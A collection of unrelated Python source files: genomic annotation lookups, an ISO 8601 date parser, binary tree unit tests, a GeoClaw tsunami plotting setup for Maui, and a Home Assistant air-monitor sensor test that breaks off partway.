annotations_in_vcf(var, "gms", "vcf", "grch37"))
attr_map = _get_vcf_info_attrs(hit) if hit is not None else {}
return apply(GmsTechs,
[attr_map.get("GMS_{0}".format(x), None) for x in techs])
def get_grc(var):
"""Return GRC patched genome regions.
"""
regions = set()
for hit in annotations_in_region(var, "grc", "bed", "grch37"):
regions.add(hit.name)
return ",".join(sorted(list(regions))) if len(regions) > 0 else None
def get_cse(var):
"""Return if a variant is in a CSE: Context-specific error region.
"""
for hit in annotations_in_region(var, "cse", "bed", "grch37"):
return True
return False
def get_encode_tfbs(var):
"""
Returns a comma-separated list of transcription factors that were
observed to bind DNA in this region. Each hit in the list is constructed
as TF_CELLCOUNT, where:
TF is the transcription factor name
CELLCOUNT is the number of cells tested that had nonzero signals
NOTE: the annotation file is in BED format, but pysam doesn't
tolerate BED files with more than 12 fields, so we just use the base
tuple parser and grab the name column (4th column)
"""
tfbs = []
for hit in annotations_in_region(var, "encode_tfbs", "tuple"):
tfbs.append(hit[3] + "_" + hit[4])
if len(tfbs) > 0:
return ','.join(tfbs)
else:
return None
def get_encode_dnase_clusters(var):
"""
If a variant overlaps a DnaseI cluster, return the number of cell types
that were found to have DnaseI HS at in the given interval, as well
as a comma-separated list of each cell type:
Example data:
chr1 20042385 20042535 4 50.330600 8988t;K562;Osteobl;hTH1
chr1 20043060 20043210 3 12.450500 Gm12891;T47d;hESCT0
chr1 20043725 20043875 2 5.948180 Fibrobl;Fibrop
chr1 20044125 20044275 3 6.437350 HESC;Ips;hTH1
"""
for hit in annotations_in_region(var, "encode_dnase1", "tuple"):
return ENCODEDnaseIClusters(hit[3], hit[5])
return ENCODEDnaseIClusters(None, None)
def get_encode_consensus_segs(var):
"""
Queries a meta-BEDGRAPH of consensus ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
CTCF: CTCF-enriched element
E: Predicted enhancer
PF: Predicted promoter flanking region
R: Predicted repressed or low-activity region
TSS: Predicted promoter region including TSS
T: Predicted transcribed region
WE: Predicted weak enhancer or open chromatin cis-regulatory element
"""
for hit in annotations_in_region(var, "encode_consensus_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_encode_segway_segs(var):
"""
Queries a meta-BEDGRAPH of SegWay ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
"""
for hit in annotations_in_region(var, "encode_segway_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_encode_chromhmm_segs(var):
"""
Queries a meta-BEDGRAPH of SegWay ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
"""
for hit in annotations_in_region(var, "encode_chromhmm_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_resources( args ):
"""Retrieve list of annotation resources loaded into gemini.
"""
anno_files = get_anno_files( args )
return [(n, os.path.basename(anno_files[n])) for n in sorted(anno_files.keys())]
|
|
##############################################################################
# Copyright 2009, Gerhard Weis
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the authors nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT
##############################################################################
'''
This modules provides a method to parse an ISO 8601:2004 date string to a
python datetime.date instance.
It supports all basic, extended and expanded formats as described in the ISO
standard. The only limitations it has, are given by the Python datetime.date
implementation, which does not support dates before 0001-01-01.
'''
import re
from datetime import date, timedelta
from isodate.isostrf import strftime, DATE_EXT_COMPLETE
from isodate.isoerror import ISO8601Error
DATE_REGEX_CACHE = {}
# A dictionary to cache pre-compiled regular expressions.
# A set of regular expressions is identified, by number of year digits allowed
# and whether a plus/minus sign is required or not. (This option is changeable
# only for 4 digit years).
def build_date_regexps(yeardigits=4, expanded=False):
'''
Compile set of regular expressions to parse ISO dates. The expressions will
be created only if they are not already in REGEX_CACHE.
It is necessary to fix the number of year digits, else it is not possible
to automatically distinguish between various ISO date formats.
ISO 8601 allows more than 4 digit years, on prior agreement, but then a +/-
sign is required (expanded format). To support +/- sign for 4 digit years,
the expanded parameter needs to be set to True.
'''
if yeardigits != 4:
expanded = True
if (yeardigits, expanded) not in DATE_REGEX_CACHE:
cache_entry = []
# ISO 8601 expanded DATE formats allow an arbitrary number of year
# digits with a leading +/- sign.
if expanded:
sign = 1
else:
sign = 0
# 1. complete dates:
# YYYY-MM-DD or +- YYYYYY-MM-DD... extended date format
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
r"-(?P<month>[0-9]{2})-(?P<day>[0-9]{2})"
% (sign, yeardigits)))
# YYYYMMDD or +- YYYYYYMMDD... basic date format
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
r"(?P<month>[0-9]{2})(?P<day>[0-9]{2})"
% (sign, yeardigits)))
# 2. complete week dates:
# YYYY-Www-D or +-YYYYYY-Www-D ... extended week date
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
r"-W(?P<week>[0-9]{2})-(?P<day>[0-9]{1})"
% (sign, yeardigits)))
# YYYYWwwD or +-YYYYYYWwwD ... basic week date
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})W"
r"(?P<week>[0-9]{2})(?P<day>[0-9]{1})"
% (sign, yeardigits)))
# 3. ordinal dates:
# YYYY-DDD or +-YYYYYY-DDD ... extended format
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
r"-(?P<day>[0-9]{3})"
% (sign, yeardigits)))
# YYYYDDD or +-YYYYYYDDD ... basic format
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
r"(?P<day>[0-9]{3})"
% (sign, yeardigits)))
# 4. week dates:
# YYYY-Www or +-YYYYYY-Www ... extended reduced accuracy week date
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
r"-W(?P<week>[0-9]{2})"
% (sign, yeardigits)))
# YYYYWww or +-YYYYYYWww ... basic reduced accuracy week date
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})W"
r"(?P<week>[0-9]{2})"
% (sign, yeardigits)))
# 5. month dates:
# YYY-MM or +-YYYYYY-MM ... reduced accuracy specific month
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
r"-(?P<month>[0-9]{2})"
% (sign, yeardigits)))
# 6. year dates:
# YYYY or +-YYYYYY ... reduced accuracy specific year
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
% (sign, yeardigits)))
# 7. century dates:
# YY or +-YYYY ... reduced accuracy specific century
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}"
r"(?P<century>[0-9]{%d})"
% (sign, yeardigits - 2)))
DATE_REGEX_CACHE[(yeardigits, expanded)] = cache_entry
return DATE_REGEX_CACHE[(yeardigits, expanded)]
def parse_date(datestring, yeardigits=4, expanded=False):
'''
Parse an ISO 8601 date string into a datetime.date object.
As the datetime.date implementation is limited to dates starting from
0001-01-01, negative dates (BC) and year 0 can not be parsed by this
method.
For incomplete dates, this method chooses the first day for it. For
instance if only a century is given, this method returns the 1st of
January in year 1 of this century.
supported formats: (expanded formats are shown with 6 digits for year)
YYYYMMDD +-YYYYYYMMDD basic complete date
YYYY-MM-DD +-YYYYYY-MM-DD extended complete date
YYYYWwwD +-YYYYYYWwwD basic complete week date
YYYY-Www-D +-YYYYYY-Www-D extended complete week date
YYYYDDD +-YYYYYYDDD basic ordinal date
YYYY-DDD +-YYYYYY-DDD extended ordinal date
YYYYWww +-YYYYYYWww basic incomplete week date
YYYY-Www +-YYYYYY-Www extended incomplete week date
YYY-MM +-YYYYYY-MM incomplete month date
YYYY +-YYYYYY incomplete year date
YY +-YYYY incomplete century date
@param datestring: the ISO date string to parse
@param yeardigits: how many digits are used to represent a year
@param expanded: if True then +/- signs are allowed. This parameter
is forced to True, if yeardigits != 4
@return: a datetime.date instance represented by datestring
@raise ISO8601Error: if this function can not parse the datestring
@raise ValueError: if datestring can not be represented by datetime.date
'''
if yeardigits != 4:
expanded = True
isodates = build_date_regexps(yeardigits, expanded)
for pattern in isodates:
match = pattern.match(datestring)
if match:
groups = match.groupdict()
# sign, century, year, month, week, day,
# FIXME: negative dates not possible with python standard types
sign = (groups['sign'] == '-' and -1) or 1
if 'century' in groups:
return date(sign * (int(groups['century']) * 100 + 1), 1, 1)
if 'month' not in groups: # weekdate or ordinal date
ret = date(sign * int(groups['year']), 1, 1)
if 'week' in groups:
isotuple = ret.isocalendar()
if 'day' in groups:
days = int(groups['day'] or 1)
else:
days = 1
# if first week in year, do weeks-1
return ret + timedelta(weeks=int(groups['week']) -
(((isotuple[1] == 1) and 1) or 0),
days=-isotuple[2] + days)
elif 'day' in groups: # ordinal date
return ret + timedelta(days=int(groups['day'])-1)
else: # year date
return ret
# year-, month-, or complete date
if 'day' not in groups or groups['day'] is None:
day = 1
else:
day = int(groups['day'])
return date(sign * int(groups['year']),
int(groups['month']) or 1, day)
raise ISO8601Error('Unrecognised ISO 8601 date format: %r' % datestring)
def date_isoformat(tdate, format=DATE_EXT_COMPLETE, yeardigits=4):
'''
Format date strings.
This method is just a wrapper around isodate.isostrf.strftime and uses
Date-Extended-Complete as default format.
'''
return strftime(tdate, format, yeardigits)
|
|
import unittest
from unittest import TestCase
from algorithms.dataStructures.BinaryTree import BinaryTreeNode
from algorithms.dataStructures.BinaryTree import BinaryTree
class binary_tree_creation_Test(TestCase):
def test_create_node(self):
n = BinaryTreeNode(1)
self.assertIsInstance(n, BinaryTreeNode)
def test_create_node_assigns_correct_data(self):
n = BinaryTreeNode(1)
self.assertEqual(1, n.value)
def test_create_node_assigns_None_to_left_right_parent(self):
n = BinaryTreeNode(1)
self.assertIsNone(n.left)
self.assertIsNone(n.right)
self.assertIsNone(n.parent)
def test_create_binary_tree(self):
bt = BinaryTree()
self.assertIsInstance(bt, BinaryTree)
def test_create_binary_tree_with_one_node(self):
n = BinaryTreeNode(1)
bt = BinaryTree(n)
self.assertEqual(n, bt.root)
self.assertEqual(1, bt.root.value)
self.assertIsNone(bt.root.parent)
def test_create_linked_list_with_multiple_nodes(self):
nr = BinaryTreeNode(3)
nl = BinaryTreeNode(2)
n = BinaryTreeNode(1, nl, nr)
bt = BinaryTree(n)
self.assertEqual(n, bt.root)
self.assertEqual(1, bt.root.value)
self.assertEqual(nl, bt.root.left)
self.assertEqual(2, bt.root.left.value)
self.assertEqual(nr, bt.root.right)
self.assertEqual(3, bt.root.right.value)
class empty_Test(TestCase):
def test_empty_Tree(self):
bt = BinaryTree()
self.assertTrue(bt.is_empty())
def test_one_element_Tree(self):
bt = BinaryTree(BinaryTreeNode(1))
self.assertFalse(bt.is_empty())
class transversal_Test(TestCase):
def setUp(self):
nrr = BinaryTreeNode(7)
nrl = BinaryTreeNode(6)
nlr = BinaryTreeNode(5)
nll = BinaryTreeNode(4)
nr = BinaryTreeNode(3, nrl, nrr)
nl = BinaryTreeNode(2, nll, nlr)
n = BinaryTreeNode(1, nl, nr)
self.bt = BinaryTree(n)
def test_level_order(self):
output = ''
def fcn(node):
nonlocal output
output += str(node.value) + ' '
self.bt.root.transverse(fcn)
self.assertEqual("1 2 3 4 5 6 7 ", output)
def test_inorder(self):
output = ''
def fcn(node):
nonlocal output
output += str(node.value) + ' '
self.bt.root.transverse_inorder(fcn)
self.assertEqual("4 2 5 1 6 3 7 ", output)
def test_preorder(self):
output = ''
def fcn(value):
nonlocal output
output += str(value) + ' '
self.bt.root.transverse_preorder(fcn)
self.assertEqual("1 2 4 5 3 6 7 ", output)
def test_postorder(self):
import sys
from io import StringIO
saved_stdout = sys.stdout
try:
out = StringIO()
sys.stdout = out
self.bt.root.transverse_postorder(print)
output = out.getvalue().strip()
self.assertEqual(output, "4\n5\n2\n6\n7\n3\n1")
finally:
sys.stdout = saved_stdout
class contains_Test(TestCase):
def setUp(self):
nrr = BinaryTreeNode(7)
nrl = BinaryTreeNode(6)
nlr = BinaryTreeNode(5)
nll = BinaryTreeNode(4)
nr = BinaryTreeNode(3, nrl, nrr)
nl = BinaryTreeNode(2, nll, nlr)
n = BinaryTreeNode(1, nl, nr)
self.bt = BinaryTree(n)
def test_contains(self):
self.assertTrue(self.bt.contains(1))
self.assertTrue(self.bt.contains(2))
self.assertTrue(self.bt.contains(3))
self.assertTrue(self.bt.contains(4))
self.assertTrue(self.bt.contains(5))
self.assertTrue(self.bt.contains(6))
self.assertTrue(self.bt.contains(7))
def test_does_not_contain(self):
self.assertFalse(self.bt.contains(8))
self.assertFalse(self.bt.contains(0))
self.assertFalse(self.bt.contains('a'))
self.assertFalse(self.bt.contains(45))
self.assertFalse(self.bt.contains((1, 2)))
self.assertFalse(self.bt.contains("tree"))
class insert_Test(TestCase):
def test_insert_empty_tree(self):
bt = BinaryTree()
bt.insert(1)
self.assertEqual(1, bt.root.value)
def test_insert_just_root_node(self):
n = BinaryTreeNode(1)
bt = BinaryTree(n)
bt.insert(2)
self.assertEqual(2, bt.root.left.value)
def test_insert_root_and_left_node(self):
nl = BinaryTreeNode(2)
n = BinaryTreeNode(1, nl)
bt = BinaryTree(n)
bt.insert(3)
self.assertEqual(3, bt.root.right.value)
def test_insert_root_and_right_node(self):
nr = BinaryTreeNode(2)
n = BinaryTreeNode(1, None, nr)
bt = BinaryTree(n)
bt.insert(3)
self.assertEqual(3, bt.root.left.value)
def test_insert_root_left_and_right_node(self):
nr = BinaryTreeNode(3)
nl = BinaryTreeNode(2)
n = BinaryTreeNode(1, nl, nr)
bt = BinaryTree(n)
bt.insert(4)
self.assertEqual(4, bt.root.left.left.value)
def test_insert_root_two_left_nodes(self):
nll = BinaryTreeNode(3)
nl = BinaryTreeNode(2, nll)
n = BinaryTreeNode(1, nl)
bt = BinaryTree(n)
bt.insert(4)
self.assertEqual(4, bt.root.right.value)
def test_insert_root_two_right_nodes(self):
nrr = BinaryTreeNode(3)
nr = BinaryTreeNode(2, None, nrr)
n = BinaryTreeNode(1, None, nr)
bt = BinaryTree(n)
bt.insert(4)
self.assertEqual(4, bt.root.left.value)
if __name__ == '__main__':
unittest.main()
|
|
"""
Set up the plot figures, axes, and items to be done for each frame.
This module is imported by the plotting routines and then the
function setplot is called to set the plot parameters.
"""
#--------------------------
def setplot(plotdata):
#--------------------------
"""
Specify what is to be plotted at each frame.
Input: plotdata, an instance of clawpack.visclaw.data.ClawPlotData.
Output: a modified version of plotdata.
"""
from clawpack.visclaw import colormaps, geoplot
from numpy import linspace
plotdata.clearfigures() # clear any old figures,axes,items data
# To plot gauge locations on pcolor or contour plot, use this as
# an afteraxis function:
def addgauges(current_data):
from clawpack.visclaw import gaugetools
gaugetools.plot_gauge_locations(current_data.plotdata, \
gaugenos='all', format_string='ko', add_labels=False)
def fixup(current_data):
import pylab
addgauges(current_data)
t = current_data.t
t = t / 3600. # hours
pylab.title('Surface at %4.2f hours' % t, fontsize=20)
#pylab.xticks(fontsize=15)
#pylab.yticks(fontsize=15)
#-----------------------------------------
# Figure for imshow plot
#-----------------------------------------
plotfigure = plotdata.new_plotfigure(name='Domain', figno=1)
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes('imshow')
plotaxes.title = 'Surface'
plotaxes.scaled = True
plotaxes.afteraxes = fixup
# Water
plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
# plotitem.plot_var = geoplot.surface
plotitem.plot_var = geoplot.surface_or_depth
plotitem.imshow_cmap = geoplot.tsunami_colormap
plotitem.imshow_cmin = -0.5
plotitem.imshow_cmax = 0.5
plotitem.add_colorbar = True
plotitem.amr_celledges_show = [0,0,0]
plotitem.patchedges_show = 0
#plotitem.amr_patchedges_show = [1,1,1,0,0] # only coarse levels
# Land
plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
plotitem.plot_var = geoplot.land
plotitem.imshow_cmap = geoplot.land_colors
plotitem.imshow_cmin = 0.0
plotitem.imshow_cmax = 100.0
plotitem.add_colorbar = False
plotitem.amr_celledges_show = [0,0,0]
plotitem.patchedges_show = 0
#plotitem.amr_patchedges_show = [1,1,1,0,0] # only coarse levels
plotaxes.xlimits = 'auto'
plotaxes.ylimits = 'auto'
# add contour lines of bathy if desired:
plotitem = plotaxes.new_plotitem(plot_type='2d_contour')
plotitem.show = False
plotitem.plot_var = geoplot.topo
plotitem.contour_levels = linspace(-2000,0,5)
plotitem.amr_contour_colors = ['y'] # color on each level
plotitem.kwargs = {'linestyles':'solid','linewidths':2}
plotitem.amr_contour_show = [1,0,0]
plotitem.celledges_show = 0
plotitem.patchedges_show = 0
#-----------------------------------------
# Figure for zoom plot
#-----------------------------------------
plotfigure = plotdata.new_plotfigure(name='Maui', figno=2)
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes('imshow')
plotaxes.title = 'Surface'
plotaxes.scaled = True
plotaxes.afteraxes = fixup
# Water
plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
# plotitem.plot_var = geoplot.surface
plotitem.plot_var = geoplot.surface_or_depth
plotitem.imshow_cmap = geoplot.tsunami_colormap
plotitem.imshow_cmin = -1.
plotitem.imshow_cmax = 1.
plotitem.add_colorbar = True
plotitem.amr_celledges_show = [0,0,0]
plotitem.patchedges_show = 0
# Land
plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
plotitem.plot_var = geoplot.land
plotitem.imshow_cmap = geoplot.land_colors
plotitem.imshow_cmin = 0.0
plotitem.imshow_cmax = 100.0
plotitem.add_colorbar = False
plotitem.amr_celledges_show = [0,0,0]
plotitem.patchedges_show = 0
plotaxes.xlimits = [203.2, 204.1]
plotaxes.ylimits = [20.4, 21.3]
# add contour lines of bathy if desired:
plotitem = plotaxes.new_plotitem(plot_type='2d_contour')
plotitem.show = False
plotitem.plot_var = geoplot.topo
plotitem.contour_levels = linspace(-2000,0,5)
plotitem.amr_contour_colors = ['y'] # color on each level
plotitem.kwargs = {'linestyles':'solid','linewidths':2}
plotitem.amr_contour_show = [1,0,0]
plotitem.celledges_show = 0
plotitem.patchedges_show = 0
#-----------------------------------------
# Figure for zoom plot
#-----------------------------------------
plotfigure = plotdata.new_plotfigure(name='Kahului Harbor', figno=3)
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes('imshow')
plotaxes.title = 'Surface'
plotaxes.scaled = True
plotaxes.afteraxes = fixup
# Water
plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
# plotitem.plot_var = geoplot.surface
plotitem.plot_var = geoplot.surface_or_depth
plotitem.imshow_cmap = geoplot.tsunami_colormap
plotitem.imshow_cmin = -0.2
plotitem.imshow_cmax = 0.2
plotitem.add_colorbar = True
plotitem.celledges_show = 0
plotitem.patchedges_show = 0
# Land
plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
plotitem.plot_var = geoplot.land
plotitem.imshow_cmap = geoplot.land_colors
plotitem.imshow_cmin = 0.0
plotitem.imshow_cmax = 10.0
plotitem.add_colorbar = False
plotitem.celledges_show = 0
plotitem.patchedges_show = 0
plotaxes.xlimits = [203.48, 203.57]
plotaxes.ylimits = [20.88, 20.94]
# add contour lines of bathy if desired:
plotitem = plotaxes.new_plotitem(plot_type='2d_contour')
plotitem.show = False
plotitem.plot_var = geoplot.topo
#plotitem.contour_levels = linspace(-2000,0,5)
plotitem.contour_levels = linspace(0,8,9)
plotitem.amr_contour_colors = ['y'] # color on each level
plotitem.kwargs = {'linestyles':'solid','linewidths':2}
plotitem.amr_contour_show = [0,0,0,0,0,1]
plotitem.celledges_show = 0
plotitem.patchedges_show = 0
#-----------------------------------------
# Figures for gauges
#-----------------------------------------
plotfigure = plotdata.new_plotfigure(name='Surface', figno=300, \
type='each_gauge')
plotfigure.clf_each_gauge = True
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
#plotaxes.axescmd = 'subplot(2,1,1)'
plotaxes.title = 'Surface'
# Plot surface as blue curve:
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
plotitem.plot_var = 3
plotitem.plotstyle = 'b-'
plotitem.kwargs = {'linewidth':2}
# Plot topo as green curve:
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
plotitem.show = False
def gaugetopo(current_data):
q = current_data.q
h = q[0,:]
eta = q[3,:]
topo = eta - h
return topo
plotitem.plot_var = gaugetopo
plotitem.plotstyle = 'g-'
def add_zeroline(current_data):
from pylab import plot, legend, xticks, floor, xlim,ylim
t = current_data.t
#legend(('surface','topography'),loc='lower left')
plot(t, 0*t, 'k')
#n = int(floor(t.max()/1800.)) + 2
#xticks([1800*i for i in range(n)],[str(0.5*i) for i in range(n)])
#xlim(25000,t.max())
#ylim(-0.5,0.5)
print("+++ gaugeno = ",current_data.gaugeno)
def add_legend_eta(current_data):
from pylab import legend
legend(('Surface'),loc='lower left')
add_zeroline(current_data)
plotaxes.ylimits = [-2.5, 2.5]
plotaxes.afteraxes = add_zeroline
plotfigure = plotdata.new_plotfigure(name='Velocities', figno=301, \
type='each_gauge')
plotfigure.clf_each_gauge = True
plotaxes = plotfigure.new_plotaxes()
#plotaxes.axescmd = 'subplot(2,1,2)'
plotaxes.title = 'Velocities'
plotaxes.afteraxes = add_zeroline
# Plot velocity as red curve:
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
plotitem.show = True
def speed(current_data):
from numpy import where, sqrt
h = current_data.q[0,:]
h = where(h>0.01, h, 1.e6)
u = 100. * current_data.q[1,:] / h
v = 100. * current_data.q[2,:] / h
s = sqrt(u**2 + v**2)
return s
plotitem.plot_var = speed
plotitem.plotstyle = 'k-'
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
def uvel(current_data):
from numpy import where, sqrt
h = current_data.q[0,:]
h = where(h>0.01, h, 1.e6)
u = 100. * current_data.q[1,:] / h
return u
plotitem.plot_var = uvel
plotitem.plotstyle = 'r-'
plotitem.kwargs = {'linewidth':2}
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
def vvel(current_data):
from numpy import where, sqrt
h = current_data.q[0,:]
h = where(h>0.01, h, 1.e6)
v = 100. * current_data.q[2,:] / h
return v
plotitem.plot_var = vvel
plotitem.plotstyle = 'g-'
plotitem.kwargs = {'linewidth':2}
def add_legend_vel(current_data):
from pylab import legend
# legend(["u","v"],'upper left')
legend(['Speed','uvel','vvel'],loc='upper left')
add_zeroline(current_data)
plotaxes.ylimits = [-50,50]
plotaxes.afteraxes = add_legend_vel
#-----------------------------------------
# Plots of timing (CPU and wall time):
def make_timing_plots(plotdata):
from clawpack.visclaw import plot_timing_stats
import os,sys
try:
timing_plotdir = plotdata.plotdir + '/_timing_figures'
os.system('mkdir -p %s' % timing_plotdir)
# adjust units for plots based on problem:
units = {'comptime':'seconds', 'simtime':'hours',
'cell':'millions'}
plot_timing_stats.make_plots(outdir=plotdata.outdir,
make_pngs=True,
plotdir=timing_plotdir,
units=units)
except:
print('*** Error making timing plots')
otherfigure = plotdata.new_otherfigure(name='timing plots',
fname='_timing_figures/timing.html')
otherfigure.makefig = make_timing_plots
#-----------------------------------------
# Parameters used only when creating html and/or latex hardcopy
# e.g., via clawpack.visclaw.frametools.printframes:
plotdata.printfigs = True # print figures
plotdata.print_format = 'png' # file format
plotdata.print_framenos = 'all' # list of frames to print
plotdata.print_gaugenos = 'all' # list of gauges to print
plotdata.print_fignos = [1,2,3,300,301] # list of figures to print
plotdata.html = True # create html files of plots?
plotdata.html_homelink = '../README.html' # pointer for top of index
plotdata.latex = False # create latex file of plots?
plotdata.latex_figsperline = 2 # layout of plots
plotdata.latex_framesperline = 1 # layout of plots
plotdata.latex_makepdf = False # also run pdflatex?
plotdata.parallel = False
return plotdata
if __name__=="__main__":
import matplotlib.pyplot as plt
plt.switch_backend('agg')
from clawpack.visclaw.plotclaw import plotclaw
plotclaw(outdir='.',setplot='setplot.py', plotdir='_plots',format='forestclaw')
|
|
"""Test sensor of Nettigo Air Monitor integration."""
from datetime import timedelta
from unittest.mock import AsyncMock, Mock, patch
from nettigo_air_monitor import ApiError
from homeassistant.components.nam.const import DOMAIN
from homeassistant.components.sensor import (
ATTR_STATE_CLASS,
DOMAIN as SENSOR_DOMAIN,
SensorDeviceClass,
SensorStateClass,
)
from homeassistant.const import (
ATTR_DEVICE_CLASS,
ATTR_ENTITY_ID,
ATTR_ICON,
ATTR_UNIT_OF_MEASUREMENT,
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_MILLION,
PERCENTAGE,
PRESSURE_HPA,
SIGNAL_STRENGTH_DECIBELS_MILLIWATT,
STATE_UNAVAILABLE,
TEMP_CELSIUS,
)
from homeassistant.helpers import entity_registry as er
from homeassistant.setup import async_setup_component
from homeassistant.util.dt import utcnow
from . import INCOMPLETE_NAM_DATA, nam_data
from tests.common import async_fire_time_changed
from tests.components.nam import init_integration
async def test_sensor(hass):
"""Test states of the air_quality."""
registry = er.async_get(hass)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"aa:bb:cc:dd:ee:ff-signal",
suggested_object_id="nettigo_air_monitor_signal_strength",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"aa:bb:cc:dd:ee:ff-uptime",
suggested_object_id="nettigo_air_monitor_uptime",
disabled_by=None,
)
await init_integration(hass)
state = hass.states.get("sensor.nettigo_air_monitor_bme280_humidity")
assert state
assert state.state == "45.7"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.HUMIDITY
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PERCENTAGE
entry = registry.async_get("sensor.nettigo_air_monitor_bme280_humidity")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-bme280_humidity"
state = hass.states.get("sensor.nettigo_air_monitor_bme280_temperature")
assert state
assert state.state == "7.6"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TEMPERATURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
entry = registry.async_get("sensor.nettigo_air_monitor_bme280_temperature")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-bme280_temperature"
state = hass.states.get("sensor.nettigo_air_monitor_bme280_pressure")
assert state
assert state.state == "1011"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PRESSURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PRESSURE_HPA
entry = registry.async_get("sensor.nettigo_air_monitor_bme280_pressure")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-bme280_pressure"
state = hass.states.get("sensor.nettigo_air_monitor_bmp180_temperature")
assert state
assert state.state == "7.6"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TEMPERATURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
entry = registry.async_get("sensor.nettigo_air_monitor_bmp180_temperature")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-bmp180_temperature"
state = hass.states.get("sensor.nettigo_air_monitor_bmp180_pressure")
assert state
assert state.state == "1032"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.PRESSURE
assert state.attributes.get(ATTR_STATE_CLASS) is SensorStateClass.MEASUREMENT
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PRESSURE_HPA
entry = registry.async_get("sensor.nettigo_air_monitor_bmp180_pressure")
assert entry
assert entry.unique_id == "aa:bb:cc:dd:ee:ff-bmp180_pressure"
state = hass.states.get("sensor.nettigo_air_monitor_bmp280_temperature")
assert state
assert state.state == "5.6"
assert state.attributes.get(ATTR_DEVICE_CLASS) == SensorDeviceClass.TEMPERATURE
